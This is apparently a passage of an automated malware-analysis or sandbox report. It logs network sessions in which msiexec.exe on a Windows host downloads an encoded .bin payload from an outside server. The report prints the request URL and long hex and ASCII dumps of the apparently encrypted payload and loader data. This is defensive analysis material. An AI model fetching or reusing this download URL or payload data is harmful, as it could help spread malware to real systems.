                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              cf-cache-status: DYNAMIC
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZXU44xn02CzsumQmwrn%2B50YXVHn%2B2h5X0x%2F58GnbxBfYr%2F8HhB3txZUN1yn8Zp45qfDNCKRUEABaCT9II6CsSK0YI%2B7kl%2Fz%2FdkMHsR%2FB%2BbiPw0xFOI7maDb7bm0%3D"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              Server: cloudflare
                                                                              CF-RAY: 8fa8e5270c6a0f70-EWR
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1617&min_rtt=1605&rtt_var=626&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2817&recv_bytes=789&delivery_rate=1714621&cwnd=207&unsent_bytes=0&cid=461b5e1a97a307f7&ts=316&x=0"
                                                                              2024-12-31 08:28:16 UTC578INData Raw: 31 62 34 61 0d 0a 63 51 47 62 63 51 47 62 75 7a 53 67 46 41 42 78 41 5a 74 78 41 5a 73 44 58 43 51 45 36 77 4b 55 76 65 73 43 4d 4e 69 35 6a 73 37 53 50 4f 73 43 55 6e 66 72 41 72 45 34 67 66 45 36 79 72 74 76 63 51 47 62 36 77 4a 4a 74 6f 48 70 74 41 52 70 55 33 45 42 6d 33 45 42 6d 33 45 42 6d 2b 73 43 78 46 36 36 61 48 70 6f 55 2b 73 43 6b 30 7a 72 41 72 48 73 36 77 4b 31 6e 75 73 43 71 36 77 78 79 75 73 43 4b 44 42 78 41 5a 75 4a 46 41 76 72 41 71 47 44 63 51 47 62 30 65 4c 72 41 6d 77 79 63 51 47 62 67 38 45 45 36 77 4a 54 73 48 45 42 6d 34 48 35 6a 4a 4a 52 42 48 7a 4b 36 77 49 61 6e 48 45 42 6d 34 74 45 4a 41 52 78 41 5a 76 72 41 6e 33 66 69 63 4e 78 41 5a 74 78 41 5a 75 42 77 34 75 57 5a 77 50 72 41 6e 2f 61 36 77 4b 6c 52 37 70 46 4b 59 34 43 63
                                                                              Data Ascii: 1b4acQGbcQGbuzSgFABxAZtxAZsDXCQE6wKUvesCMNi5js7SPOsCUnfrArE4gfE6yrtvcQGb6wJJtoHptARpU3EBm3EBm3EBm+sCxF66aHpoU+sCk0zrArHs6wK1nusCq6wxyusCKDBxAZuJFAvrAqGDcQGb0eLrAmwycQGbg8EE6wJTsHEBm4H5jJJRBHzK6wIanHEBm4tEJARxAZvrAn3ficNxAZtxAZuBw4uWZwPrAn/a6wKlR7pFKY4Cc
                                                                              2024-12-31 08:28:16 UTC1369INData Raw: 6d 34 48 44 42 41 45 41 41 48 45 42 6d 33 45 42 6d 31 50 72 41 76 62 30 63 51 47 62 61 76 39 78 41 5a 74 78 41 5a 75 44 77 67 58 72 41 76 6c 4b 63 51 47 62 4d 66 62 72 41 6d 5a 4e 63 51 47 62 4d 63 6e 72 41 67 4f 66 63 51 47 62 69 78 70 78 41 5a 76 72 41 6d 36 63 51 58 45 42 6d 33 45 42 6d 7a 6b 63 43 6e 58 30 36 77 4b 2b 49 4f 73 43 63 74 6c 47 36 77 4b 2b 70 4f 73 43 69 67 53 41 66 41 72 37 75 48 58 63 63 51 47 62 36 77 4a 68 55 49 74 45 43 76 78 78 41 5a 76 72 41 67 58 6b 4b 66 44 72 41 67 71 6c 63 51 47 62 2f 39 4a 78 41 5a 76 72 41 69 30 50 75 73 68 36 42 41 42 78 41 5a 76 72 41 6a 74 6a 4d 63 44 72 41 76 51 73 36 77 4a 44 65 49 74 38 4a 41 78 78 41 5a 76 72 41 75 6f 4d 67 54 51 48 75 48 78 4a 61 2b 73 43 2b 6c 54 72 41 68 44 37 67 38 41 45 36 77 4c
                                                                              Data Ascii: m4HDBAEAAHEBm3EBm1PrAvb0cQGbav9xAZtxAZuDwgXrAvlKcQGbMfbrAmZNcQGbMcnrAgOfcQGbixpxAZvrAm6cQXEBm3EBmzkcCnX06wK+IOsCctlG6wK+pOsCigSAfAr7uHXccQGb6wJhUItECvxxAZvrAgXkKfDrAgqlcQGb/9JxAZvrAi0Push6BABxAZvrAjtjMcDrAvQs6wJDeIt8JAxxAZvrAuoMgTQHuHxJa+sC+lTrAhD7g8AE6wL
                                                                              2024-12-31 08:28:16 UTC1369INData Raw: 77 66 6e 50 76 39 52 66 6d 6c 65 4d 41 65 6f 37 2f 68 49 4a 79 62 43 4a 71 44 47 57 6f 5a 4a 69 42 6a 53 62 55 35 4f 65 6a 6d 39 33 4f 50 4a 76 4d 69 71 4a 33 33 42 52 54 46 39 32 6f 57 4b 6c 47 32 58 72 37 49 51 34 6e 57 6c 4f 64 6f 78 6b 74 69 58 79 49 72 49 6c 66 39 2f 61 61 37 4c 34 76 49 70 68 79 76 55 76 30 37 55 50 6b 4c 67 68 4c 38 79 55 4e 35 34 62 37 67 73 38 64 53 4b 4a 2f 31 65 53 49 64 61 2f 70 55 7a 67 53 4f 5a 4c 64 58 69 57 58 31 49 39 6f 47 39 50 48 4a 54 47 6c 56 46 4e 4d 48 75 4e 47 73 48 75 7a 46 54 48 73 42 73 4e 4b 69 30 57 66 71 38 76 4b 75 4d 46 57 51 63 5a 50 79 41 6e 69 68 7a 36 69 63 65 6c 2b 77 4f 4f 52 71 2b 71 4c 52 57 45 44 30 47 48 42 68 65 37 76 32 33 69 4c 68 38 53 57 51 32 4a 53 78 76 75 43 49 52 34 6a 33 6b 53 57 75 34
                                                                              Data Ascii: wfnPv9RfmleMAeo7/hIJybCJqDGWoZJiBjSbU5Oejm93OPJvMiqJ33BRTF92oWKlG2Xr7IQ4nWlOdoxktiXyIrIlf9/aa7L4vIphyvUv07UPkLghL8yUN54b7gs8dSKJ/1eSIda/pUzgSOZLdXiWX1I9oG9PHJTGlVFNMHuNGsHuzFTHsBsNKi0Wfq8vKuMFWQcZPyAnihz6icel+wOORq+qLRWED0GHBhe7v23iLh8SWQ2JSxvuCIR4j3kSWu4
                                                                              2024-12-31 08:28:16 UTC1369INData Raw: 69 5a 75 6d 52 2f 54 30 6c 72 75 48 78 4a 61 37 68 38 53 57 75 34 66 4e 78 54 51 78 4d 36 30 4b 35 59 42 6d 54 71 7a 2f 35 7a 61 75 51 31 4f 4d 77 72 44 51 37 66 30 62 39 43 70 37 39 73 68 65 49 6c 6b 77 6f 50 61 43 72 31 2f 78 54 49 76 53 6b 2b 47 39 46 47 36 75 58 78 4f 62 36 79 38 43 46 4b 79 4a 6c 53 4f 59 66 45 4f 59 34 4e 59 7a 41 43 77 48 47 74 68 51 75 36 33 70 4f 62 49 75 7a 4b 64 39 34 65 70 63 32 57 2f 79 44 58 39 4f 63 76 46 59 59 63 77 2f 54 75 58 37 43 46 79 71 70 35 4f 72 66 69 2f 55 31 50 68 70 50 71 6d 6a 6c 49 62 65 47 57 43 64 4c 71 76 46 69 43 44 77 63 73 52 6d 50 75 42 30 6c 72 75 48 78 4a 61 37 68 38 53 57 75 34 66 50 32 37 53 69 49 30 6c 46 43 6a 44 6d 2b 34 39 63 78 44 75 58 78 4a 5a 4c 6b 68 53 57 75 34 66 45 6c 72 75 48 78 4a 61
                                                                              Data Ascii: iZumR/T0lruHxJa7h8SWu4fNxTQxM60K5YBmTqz/5zauQ1OMwrDQ7f0b9Cp79sheIlkwoPaCr1/xTIvSk+G9FG6uXxOb6y8CFKyJlSOYfEOY4NYzACwHGthQu63pObIuzKd94epc2W/yDX9OcvFYYcw/TuX7CFyqp5Orfi/U1PhpPqmjlIbeGWCdLqvFiCDwcsRmPuB0lruHxJa7h8SWu4fP27SiI0lFCjDm+49cxDuXxJZLkhSWu4fElruHxJa
                                                                              2024-12-31 08:28:16 UTC1369INData Raw: 31 70 41 4c 34 58 6b 58 39 73 42 55 54 78 43 67 7a 33 6b 57 44 4e 65 76 48 4a 4c 59 6f 56 73 69 59 6f 54 2f 32 47 54 6d 50 64 56 4b 37 79 63 69 6f 76 4e 44 62 6d 44 6d 50 66 4e 67 48 6e 4d 42 67 2f 42 57 37 4f 2b 7a 78 4d 64 59 2b 66 6c 79 52 79 6a 33 43 48 67 47 56 55 59 50 5a 63 38 35 41 6e 76 42 49 31 50 4f 56 53 68 59 4c 38 48 7a 51 6c 32 73 63 4d 45 7a 69 5a 68 75 34 66 45 6c 72 75 48 78 4a 61 37 68 38 53 57 73 47 52 53 36 2f 6c 36 62 51 53 30 43 72 71 53 37 51 6a 64 48 30 38 78 52 2b 59 4a 68 31 47 39 48 5a 56 50 52 57 4f 62 37 57 64 78 39 38 79 49 45 68 47 53 70 56 4d 55 35 53 68 78 34 4b 32 4b 59 71 51 57 41 34 73 33 59 74 2f 51 59 68 50 2b 73 79 4b 65 4b 4b 33 77 66 4b 41 75 4c 39 66 55 2f 33 6d 67 59 31 4f 55 68 74 66 73 61 46 76 35 69 33 75 33
                                                                              Data Ascii: 1pAL4XkX9sBUTxCgz3kWDNevHJLYoVsiYoT/2GTmPdVK7yciovNDbmDmPfNgHnMBg/BW7O+zxMdY+flyRyj3CHgGVUYPZc85AnvBI1POVShYL8HzQl2scMEziZhu4fElruHxJa7h8SWsGRS6/l6bQS0CrqS7QjdH08xR+YJh1G9HZVPRWOb7Wdx98yIEhGSpVMU5Shx4K2KYqQWA4s3Yt/QYhP+syKeKK3wfKAuL9fU/3mgY1OUhtfsaFv5i3u3
                                                                              2024-12-31 08:28:16 UTC940INData Raw: 2b 76 70 4e 71 53 46 6e 53 43 79 7a 5a 4c 69 6b 74 47 75 34 66 45 6c 72 75 48 78 4a 61 37 68 38 53 65 4f 79 76 49 6f 67 71 51 36 49 4b 61 6f 6d 73 65 47 35 58 35 30 32 48 50 35 44 63 63 2f 43 35 38 75 34 2f 58 31 50 7a 65 48 30 36 2b 72 47 32 6d 69 51 6b 4d 69 42 72 38 36 64 52 7a 6d 2b 7a 63 51 55 50 42 6e 33 4d 5a 78 41 65 79 55 61 7a 4b 4c 50 57 57 77 78 62 47 46 34 58 6a 73 67 4c 34 5a 70 5a 6f 6d 79 4b 7a 64 69 36 42 64 52 69 38 35 2b 30 74 49 30 5a 33 34 64 59 79 62 54 64 35 70 46 72 38 70 4e 6b 7a 35 76 65 77 52 55 55 34 32 48 52 4b 77 7a 50 4c 59 54 36 6f 78 59 69 30 52 7a 63 6f 55 53 44 6f 57 33 4a 47 4d 6e 43 70 79 74 75 74 43 51 58 55 6a 36 36 6f 78 59 2b 53 6d 65 43 45 5a 72 59 59 42 4a 61 37 68 38 53 57 75 34 66 45 6c 72 75 48 7a 43 47 55 69
                                                                              Data Ascii: +vpNqSFnSCyzZLiktGu4fElruHxJa7h8SeOyvIogqQ6IKaomseG5X502HP5Dcc/C58u4/X1PzeH06+rG2miQkMiBr86dRzm+zcQUPBn3MZxAeyUazKLPWWwxbGF4XjsgL4ZpZomyKzdi6BdRi85+0tI0Z34dYybTd5pFr8pNkz5vewRUU42HRKwzPLYT6oxYi0RzcoUSDoW3JGMnCpytutCQXUj66oxY+SmeCEZrYYBJa7h8SWu4fElruHzCGUi
                                                                              2024-12-31 08:28:16 UTC1369INData Raw: 31 36 61 30 0d 0a 53 4c 36 6b 2b 55 2f 76 41 35 2f 62 36 48 61 62 62 61 36 6e 2f 57 51 75 79 45 39 58 36 63 67 36 6a 4a 30 57 4a 7a 70 63 56 66 4b 78 59 63 54 66 50 39 7a 38 6c 45 4d 6d 72 4f 61 67 71 66 4c 42 34 59 56 53 44 53 75 37 78 78 51 5a 64 4d 6c 4f 74 76 45 4a 2b 2b 46 6f 50 56 50 45 31 72 36 63 57 34 4d 77 66 57 79 4a 6f 54 4e 4d 35 42 4f 62 32 32 55 33 41 44 77 47 4c 36 77 70 70 41 38 67 4f 74 7a 62 58 4f 67 67 69 79 73 2f 5a 79 44 66 2f 41 79 44 6b 67 39 75 33 70 6b 46 63 79 64 4b 79 38 71 32 71 32 44 50 49 4f 74 41 34 30 62 6c 56 4b 55 44 68 65 64 39 44 53 4a 54 6f 37 35 59 61 5a 4f 69 6c 56 77 34 30 6e 6a 4b 47 4e 69 48 68 4a 4f 67 47 56 65 6f 30 36 2f 61 44 66 56 73 36 4c 36 6b 6c 5a 73 6e 38 4e 2f 62 68 37 42 31 73 38 4f 79 54 31 71 57 71
                                                                              Data Ascii: 16a0SL6k+U/vA5/b6Habba6n/WQuyE9X6cg6jJ0WJzpcVfKxYcTfP9z8lEMmrOagqfLB4YVSDSu7xxQZdMlOtvEJ++FoPVPE1r6cW4MwfWyJoTNM5BOb22U3ADwGL6wppA8gOtzbXOggiys/ZyDf/AyDkg9u3pkFcydKy8q2q2DPIOtA40blVKUDhed9DSJTo75YaZOilVw40njKGNiHhJOgGVeo06/aDfVs6L6klZsn8N/bh7B1s8OyT1qWq
                                                                              2024-12-31 08:28:16 UTC1369INData Raw: 45 76 77 37 6f 39 53 73 67 6d 71 4c 7a 31 36 68 33 48 78 48 44 6e 46 76 47 45 6c 58 51 79 38 33 31 32 49 48 37 4f 4e 53 69 76 76 52 53 62 4d 75 75 62 39 66 55 2b 4c 6e 6d 57 76 4f 55 68 74 7a 59 31 35 76 4b 63 49 38 58 59 4d 53 49 51 75 70 63 59 43 39 5a 5a 6e 59 46 58 6c 67 4c 52 2b 4b 33 2b 52 64 33 6d 37 79 4f 39 66 55 7a 6a 72 50 2b 73 6e 57 56 34 65 65 45 61 54 53 30 52 30 70 79 42 4e 59 56 31 72 52 6e 63 39 62 72 76 68 39 4f 58 71 51 65 37 44 5a 54 75 66 5a 55 32 6a 5a 31 43 6e 57 4a 48 42 35 6b 6c 76 6b 68 58 55 47 39 78 45 77 4f 36 77 66 6b 6c 72 33 6e 4f 4f 57 62 68 38 53 57 75 34 66 45 6c 72 75 48 78 4a 61 77 39 70 59 37 67 2f 78 4d 63 30 2b 6b 70 38 46 6e 64 30 46 46 35 77 4e 34 36 53 74 33 56 6b 48 72 68 38 53 57 75 34 66 45 6c 72 75 48 78 4a
                                                                              Data Ascii: Evw7o9SsgmqLz16h3HxHDnFvGElXQy8312IH7ONSivvRSbMuub9fU+LnmWvOUhtzY15vKcI8XYMSIQupcYC9ZZnYFXlgLR+K3+Rd3m7yO9fUzjrP+snWV4eeEaTS0R0pyBNYV1rRnc9brvh9OXqQe7DZTufZU2jZ1CnWJHB5klvkhXUG9xEwO6wfklr3nOOWbh8SWu4fElruHxJaw9pY7g/xMc0+kp8Fnd0FF5wN46St3VkHrh8SWu4fElruHxJ
                                                                              2024-12-31 08:28:16 UTC1369INData Raw: 6c 71 75 48 77 5a 30 78 63 62 68 38 36 39 4c 58 4c 48 33 30 6e 6c 6f 58 78 6a 5a 41 32 75 69 32 5a 75 64 7a 68 77 64 6a 46 6b 42 4b 66 52 33 61 44 55 41 51 4e 4e 6f 36 58 38 76 39 41 2b 51 43 52 6e 63 57 62 49 37 36 79 62 73 36 4c 6d 59 4f 5a 47 30 33 6e 6f 63 65 43 77 76 71 48 52 4b 31 53 37 4b 38 45 72 6b 46 63 37 4d 64 4d 61 37 5a 72 57 58 48 36 73 44 48 69 42 51 6b 49 78 7a 67 53 4f 37 6c 66 52 4f 33 7a 43 76 43 55 47 72 38 7a 4b 56 39 4f 57 55 37 43 4e 65 42 64 51 73 51 64 76 75 48 4f 4f 55 6c 4a 38 53 57 75 34 66 45 6c 72 75 48 78 4a 61 37 6a 43 43 48 57 47 35 4d 44 65 47 69 6d 48 65 48 54 33 44 6d 38 78 2b 53 56 71 75 48 77 68 48 52 30 78 49 32 53 34 70 32 42 72 75 48 78 4a 61 37 68 38 53 57 75 34 66 45 6e 54 38 48 6c 38 54 76 49 6f 61 57 58 71 2f
                                                                              Data Ascii: lquHwZ0xcbh869LXLH30nloXxjZA2ui2ZudzhwdjFkBKfR3aDUAQNNo6X8v9A+QCRncWbI76ybs6LmYOZG03noceCwvqHRK1S7K8ErkFc7MdMa7ZrWXH6sDHiBQkIxzgSO7lfRO3zCvCUGr8zKV9OWU7CNeBdQsQdvuHOOUlJ8SWu4fElruHxJa7jCCHWG5MDeGimHeHT3Dm8x+SVquHwhHR0xI2S4p2BruHxJa7h8SWu4fEnT8Hl8TvIoaWXq/
                                                                              2024-12-31 08:28:16 UTC1369INData Raw: 38 47 39 46 51 55 53 79 50 4f 59 35 69 62 37 57 65 79 49 45 36 4d 50 71 34 4f 59 36 30 7a 78 47 32 79 49 45 51 43 6c 53 54 4d 57 62 33 63 35 70 45 52 49 66 65 32 46 63 6d 34 68 73 52 38 6a 78 32 48 6a 54 61 57 53 39 2f 49 61 34 59 71 55 50 79 37 78 78 2f 5a 36 49 55 5a 76 51 54 4f 41 4d 69 6a 68 35 57 2f 62 6f 79 48 56 44 69 36 6e 73 53 73 63 30 43 39 55 72 57 77 39 59 71 2f 39 6b 4c 2f 37 7a 57 41 30 66 46 78 2f 62 37 76 64 2b 64 44 45 6d 31 4f 37 68 69 41 6a 61 73 37 4f 44 69 52 37 4f 6f 53 54 6e 74 61 53 63 5a 4f 77 42 61 42 76 55 31 53 61 54 31 4a 4a 78 6b 76 54 61 5a 43 31 37 62 69 31 52 42 4d 58 53 47 43 39 37 72 32 67 73 56 2f 64 6e 45 77 42 31 63 57 6a 6e 64 32 42 31 51 31 73 56 31 6d 6d 53 46 74 41 34 47 46 6e 50 4a 44 69 49 7a 74 33 32 34 6c 4c
                                                                              Data Ascii: 8G9FQUSyPOY5ib7WeyIE6MPq4OY60zxG2yIEQClSTMWb3c5pERIfe2Fcm4hsR8jx2HjTaWS9/Ia4YqUPy7xx/Z6IUZvQTOAMijh5W/boyHVDi6nsSsc0C9UrWw9Yq/9kL/7zWA0fFx/b7vd+dDEm1O7hiAjas7ODiR7OoSTntaScZOwBaBvU1SaT1JJxkvTaZC17bi1RBMXSGC97r2gsV/dnEwB1cWjnd2B1Q1sV1mmSFtA4GFnPJDiIzt324lL


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              1192.168.2.549905172.67.136.424433136C:\Windows\SysWOW64\msiexec.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-12-31 08:28:53 UTC196OUTGET /xqhIDWdU/DMScwussxSJvpugnCFVarrBXuQ197.bin HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                              Host: fo2xc.icu
                                                                              Cache-Control: no-cache
                                                                              2024-12-31 08:28:53 UTC853INHTTP/1.1 200 OK
                                                                              Date: Tue, 31 Dec 2024 08:28:53 GMT
                                                                              Content-Type: application/octet-stream
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Cache-Control: max-age=14400
                                                                              CF-Cache-Status: EXPIRED
                                                                              Last-Modified: Tue, 31 Dec 2024 08:28:53 GMT
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hISsRKA4rRW9lLHu%2BTGm5RX1kbEZOKPm6NWsmPkT0U%2Fid9ru76cAGtOQBn6yxuWdxCa6S4U9thyhpc0d4ZzcN5xvHcmizAelDUQt1ozjOqVmGE6wpRbKGw7vCCA%3D"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              Server: cloudflare
                                                                              CF-RAY: 8fa8e6122b0241cf-EWR
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1678&min_rtt=1678&rtt_var=631&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2818&recv_bytes=834&delivery_rate=1732937&cwnd=169&unsent_bytes=0&cid=82cbbf3d308c853d&ts=437&x=0"
                                                                              2024-12-31 08:28:53 UTC516INData Raw: 37 38 62 30 0d 0a 3a 1b 1c dc 90 77 9c ca f4 5a 22 81 25 5f 82 38 b5 cf 4a 5c 41 03 93 8c 82 de 15 2f 19 b2 14 94 13 08 2b 93 09 b0 3c e9 0f 5a 6a 8b 5e db a6 32 0e 4c 40 e4 19 33 43 e9 2a 74 9c 70 85 87 6e 7a cb f0 c2 fe dd f1 ad 94 49 38 e7 2c c3 3d 14 80 3f 23 75 15 a0 71 04 d6 28 33 0c c3 d0 63 67 7b d5 9d a9 cf e9 d0 92 49 04 50 0b ce 0d b9 83 8f 8c df 5b a3 ba ff 9a ff cb 69 4b c4 a4 03 40 39 a5 e4 8c e1 f8 2c 1f 62 7f 49 63 ac c9 27 1d ce 2d e7 c3 07 ad c0 85 64 6a 5e 46 27 a4 ae 8c c2 c7 2d 1e e9 05 93 39 26 11 97 63 a5 34 d8 99 7c 3e 5e 9a 66 48 d2 e1 cc dd 99 10 c6 4a 6e 23 4d 0f 9a 7e e3 a7 68 da 9e e4 5c 74 9f 04 24 52 4c 7f 6a 0f 90 7e 47 22 97 12 02 eb 16 65 6b 52 97 97 57 a9 f4 2e 12 2e 95 d5 4a 9b f1 cf 65 22 2a 4f fc 68 b6 de 2f fe 5d 38
                                                                              Data Ascii: 78b0:wZ"%_8J\A/+<Zj^2L@3C*tpnzI8,=?#uq(3cg{IP[iK@9,bIc'-dj^F'-9&c4|>^fHJn#M~h\t$RLj~G"ekRW..Je"*Oh/]8
                                                                              2024-12-31 08:28:53 UTC1369INData Raw: 1b 37 84 9a 00 58 c6 95 91 76 64 8c 31 28 9d bd ff df 70 19 fd 62 5e 0e 13 3a 14 ad 29 bf 6c ca a3 d6 21 a6 90 f2 3d 25 1e 60 97 2e 4c 5c 30 ff 99 c1 e7 8c e5 da 12 8f 84 27 97 b9 23 45 78 a0 78 0a 9c 70 9e dc a5 ee b1 e6 d2 1f a9 52 44 5d c9 b0 9a 08 79 68 22 78 cb 1b 32 cc 7f 50 29 93 e9 0c ec 7b a7 66 61 c6 1f a2 ce 89 63 62 28 af 9c f0 d7 99 05 cb e5 f8 d2 02 d2 80 fa df f5 3c f3 4e cc d6 4f 66 46 0b 2d ec 68 c6 63 c1 ae 6b 6e ae 4f c1 6d 56 07 e6 2c 2b 56 ec b3 ce 7d 00 f8 c5 91 d7 23 d1 fc 13 63 78 62 81 21 dc 8c 43 f3 c7 27 1a b2 a7 04 d6 6e 2b de 86 6f c8 22 a3 d5 1f d6 4c b9 e5 f7 c9 3c fc e8 7b 26 d3 65 43 c2 e4 c7 9f 62 3c 6f 7c 3c 14 2a 3e c6 8f 6c 12 70 fb 25 72 35 d0 6d 6a 74 10 5f 48 23 0b 74 0c 4a f7 bf 03 bb b7 ef 8c 75 ab 01 44 fd 64 77
                                                                              Data Ascii: 7Xvd1(pb^:)l!=%`.L\0'#ExxpRD]yh"x2P){facb(<NOfF-hcknOmV,+V}#cxb!C'n+o"L<{&eCb<o|<*>lp%r5mjt_H#tJuDdw
                                                                              2024-12-31 08:28:53 UTC1369INData Raw: 23 4f a5 87 18 f6 78 51 d9 b7 ef 19 41 11 7d eb 21 34 40 99 62 c2 00 45 46 33 ab 43 0b bd 9c cd d8 8e 4c de 47 58 2e 85 9a 76 8c 21 76 46 c0 bd 17 86 1d df fb 3b dd b7 eb 7e 53 ad c1 ed 60 ca a3 be 6a b8 d0 f2 21 62 3b 63 97 77 8f e5 a0 ba de c1 0f b0 e9 da 12 e7 d1 49 d2 b9 cb 68 5d a3 78 53 71 6e fb 1d c1 ab f6 e6 27 75 81 52 44 25 96 de df 68 94 7d 07 7f cb 42 f1 a6 7f e9 81 d6 ae 0c 04 66 8a 66 41 ae 76 ac a5 fb ef fe 78 cd 9c a9 14 ab 2c 8d a2 88 3f f4 d9 0c fb b7 86 36 b3 4e 24 31 6b 65 46 52 ee 55 c4 85 24 c1 07 6f 42 ef 61 1c a1 61 21 e6 c5 d1 11 b0 b3 a4 7d b9 bf 83 d6 d9 cb 0a d0 e3 65 10 1f ef 64 dc 64 f8 d7 c4 27 43 71 cd 44 6f 0e a3 b7 f4 f4 79 6d a3 d5 77 c5 68 fc e5 1f 0a 1f ff e8 6e e5 6a 95 fb 83 e4 2f f9 06 3d 6f 14 ad 7a 6f 3e 2e 02 08
                                                                              Data Ascii: #OxQA}!4@bEF3CLGX.v!vF;~S`j!b;cwIh]xSqn'uRD%h}BffAvx,?6N$1keFRU$oBaa!}edd'CqDoymwhnj/=ozo>.
                                                                              2024-12-31 08:28:53 UTC1369INData Raw: a3 27 ca f0 5e ee 21 e7 78 e0 08 bb 96 d9 2d e2 e8 e1 ea 27 35 b1 a2 ae cf b5 4b 8d c4 50 23 11 2a 35 08 df f6 73 5d df 95 ca 04 48 eb 53 3a eb 44 5e 6f d9 8a eb 31 2b 03 be 0f 08 76 56 a4 92 1b 37 09 d6 24 28 2e ba 97 76 8c c4 bb 0c 0d bd ff df d0 ff fd 62 1e 83 9f 1e b4 ad 29 bf 84 dd a5 d6 21 5b 19 d6 71 21 1e 60 7f 25 4a 5c 30 72 15 e5 37 8c e5 da fa 70 81 27 97 18 d7 1e 3f a0 b9 ea b7 07 fe 34 ec a9 b1 8c ef 10 53 67 50 56 8e b0 65 7d 2c 1c 67 7c 40 16 c6 97 38 50 c1 46 14 f3 13 f8 9a 12 1a 81 1f 3d 95 f4 8c cc b4 00 b4 f0 d7 43 8f 04 0d e9 fe 02 d2 8f 17 c7 78 1c d2 66 47 1a 1f 8e c5 0d 2d ec 02 a7 e8 0e 06 4e 45 ee 61 04 f8 79 21 e6 6c 88 ce ea f4 ce fe f8 fd b7 97 50 3e 25 a7 a4 65 f5 2e a5 31 34 04 46 f3 c7 78 44 e9 2c a1 8b ac ff f0 a2 4b 89 be
                                                                              Data Ascii: '^!x-'5KP#*5s]HS:D^o1+vV7$(.vb)![q!`%J\0r7p'?4SgPVe},g|@8PF=CxfG-NEay!lP>%e.14FxD,K
                                                                              2024-12-31 08:28:53 UTC1369INData Raw: 3d 09 9b aa a2 e4 ca 07 17 1c a9 16 c8 f2 4f d4 b0 57 68 03 5a 4e 6f 3b 8b 18 14 ca fe df 70 7a 4b 29 ca af 59 3e 38 a8 3c c4 f9 07 e0 91 2d 0a bc 68 3a aa 13 95 e4 46 18 6b 16 8e 9d cc 46 86 0c 21 e0 0c 38 9a e7 50 d9 ee c5 a9 a2 55 3a be 42 fe 1a cf 9d df 3f a0 f2 db e4 db d1 41 c5 af eb 43 9b 11 ce b0 28 97 91 76 4a 0c cb 28 7a c8 03 20 4d d4 13 ee e9 f1 ec 63 44 26 e7 57 26 c9 a3 d6 aa 10 cb 3b 0b 25 1e 36 1c df a4 ce 32 ff 99 4a 29 64 eb d9 12 8f 0f e1 c9 7a 75 ce 89 48 f3 0e b2 04 70 f0 f5 e6 3a 28 f4 90 db 5a 16 a5 79 b3 9a 68 97 64 dd 08 ef 17 19 1c 2d b8 05 96 e9 0c b2 b9 af 66 a9 95 1d c2 e0 70 cf ea 30 cc 9c f0 81 99 f5 40 a9 ac df ea 92 0e fb df 7e 90 09 3e dc 3e 19 64 46 0b 7d 67 a6 2e c0 c4 ee 6b 30 2c 65 a5 5a a9 97 6d 60 0f 32 59 b6 c6 7d
                                                                              Data Ascii: =OWhZNo;pzK)Y>8<-h:FkF!8PU:B?AC(vJ(z McD&W&;%62J)dzuHp:(Zyhd-fp0@~>>dF}g.k0,eZm`2Y}
                                                                              2024-12-31 08:28:53 UTC1369INData Raw: a6 c3 cf 9f f9 7e 4a 54 62 e8 b1 a3 0d 97 f4 a2 a7 6d c2 ff ce ab 43 88 06 26 18 4e c2 82 77 69 6a 7d 3f 05 74 87 24 8c 6a 0c 76 ee 18 4d 4c d4 d6 16 f2 77 a1 4d 4b 90 4d c3 d4 3a a4 06 95 26 b9 d6 35 73 c3 71 7a a9 6a 2f 55 ac a9 f2 3d 24 f5 4e 22 aa f2 5e 71 32 d4 a2 1c 65 55 05 ae 5d 51 7c bb 45 f8 73 08 d9 35 b8 a7 d5 a9 02 b1 96 c5 45 b4 ec 72 fc df 28 f1 cc bc a1 6b b1 5a d1 14 37 d4 17 04 66 96 7d 82 84 73 b6 b4 ec 91 e2 a1 82 fa d0 fb 37 95 e2 40 6c 43 26 f0 57 4f 37 5c 29 aa ab 9d 79 99 35 95 10 87 05 9a 67 ca 88 a8 4c eb b2 6c 92 02 04 4c cf b0 44 dc ba 87 d5 74 09 42 53 ad 4c 6f 1f 4e 19 42 05 a3 94 01 42 c9 e0 17 6c 42 38 ca b8 3a e4 cd 4f bb 44 a2 50 02 1f 13 0e ab a0 04 ce 1f 49 2b ac f8 76 54 99 74 13 d2 12 04 94 bb d3 8a c0 da 0c ae 54 19
                                                                              Data Ascii: ~JTbmC&Nwij}?t$jvMLwMKM:&5sqzj/U=$N"^q2eU]Q|Es5Er(kZ7f}s7@lC&WO7\)y5gLlLDtBSLoNBBlB8:ODPI+vTtT
